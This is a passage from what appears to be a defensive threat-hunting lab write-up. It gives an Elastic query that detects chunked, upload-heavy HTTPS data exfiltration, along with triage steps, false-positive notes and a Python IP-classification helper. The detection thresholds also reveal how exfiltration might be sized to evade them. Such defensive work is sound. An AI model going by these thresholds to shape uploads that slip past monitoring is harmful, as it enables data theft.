False positives to validate: Developers using portable 7-Zip builds in project directories; IT scripts that compress logs or reports using system PowerShell — review parent process and output path before dismissing.

Rule 3 — Chunked HTTPS Exfiltration — Asymmetric Upload (CRITICAL)

Fires when the same external IP receives 2 or more large HTTPS transfers totalling over 5 MB with an upload ratio above 100:1. Normal browsing sends small requests and receives large responses — exfiltration reverses this. Chunked transfers to a single destination indicate deliberate splitting to stay under DLP byte thresholds.

FROM exfil-lab-logs*
| WHERE event.category == "network"
  AND network.direction == "outbound"
  AND destination.port == 443
  AND network.bytes_out IS NOT NULL
| EVAL mb_out       = ROUND(network.bytes_out / 1048576.0, 2)
| EVAL upload_ratio = ROUND(network.bytes_out / (network.bytes_in + 1), 1)
| WHERE mb_out > 1.0
| STATS
    transfer_count  = COUNT(*),
    total_mb_out    = ROUND(SUM(network.bytes_out) / 1048576.0, 2),
    avg_mb_per_xfer = ROUND(AVG(network.bytes_out) / 1048576.0, 2),
    max_ratio       = MAX(upload_ratio)
    BY host.name, user.name, destination.ip, process.name
| WHERE transfer_count >= 2
  AND total_mb_out > 5
  AND max_ratio > 100
| SORT total_mb_out DESC

When this fires: The total_mb_out value is your data loss estimate for executive reporting — record it in your Elastic Security Case immediately. Add destination.ip as a network IOC. If Rules 1 and 2 also fired for the same host within the preceding 2 hours, treat this as a confirmed exfiltration chain and escalate to critical incident response.

False positives to validate: Cloud backup agents (Acronis, CrashPlan, Backblaze) uploading to known endpoints — add backup destination IPs to an exception list; large file sharing via approved SaaS (SharePoint, Dropbox, Box) — validate destination IP against known SaaS CIDR ranges.
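
Validating a destination against internal ranges and an exception list is easy to prototype before you encode it as a rule exception. The following is a minimal Python sketch using the standard ipaddress module; the APPROVED range is a placeholder you would replace with your own backup and SaaS CIDRs, and the function name is illustrative.

```python
import ipaddress

# RFC 1918 private ranges, listed explicitly
INTERNAL = [ipaddress.ip_network(n)
            for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Hypothetical allow-list of approved backup/SaaS ranges; replace with your own
APPROVED = [ipaddress.ip_network("198.51.100.0/24")]

def classify_destination(dest: str) -> str:
    """Classify a destination IP as internal, approved-external, or unapproved-external."""
    ip = ipaddress.ip_address(dest)
    if any(ip in net for net in INTERNAL):
        return "internal"
    if any(ip in net for net in APPROVED):
        return "approved-external"
    return "unapproved-external"

for dest in ("10.0.0.50", "198.51.100.20", "203.0.113.42"):
    print(dest, classify_destination(dest))
```

The ranges are listed explicitly rather than relying on the module's is_private helper, because the lab's 203.0.113.42 sits in a block reserved for documentation and that helper may report such addresses as private too.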

Ready for the Next Lab?

Lab #008 — Insider Threat Detection: Hunting behavioural baselines when the attacker already has legitimate credentials

New labs drop 2–3 times per week on Hunt Forward and Medium.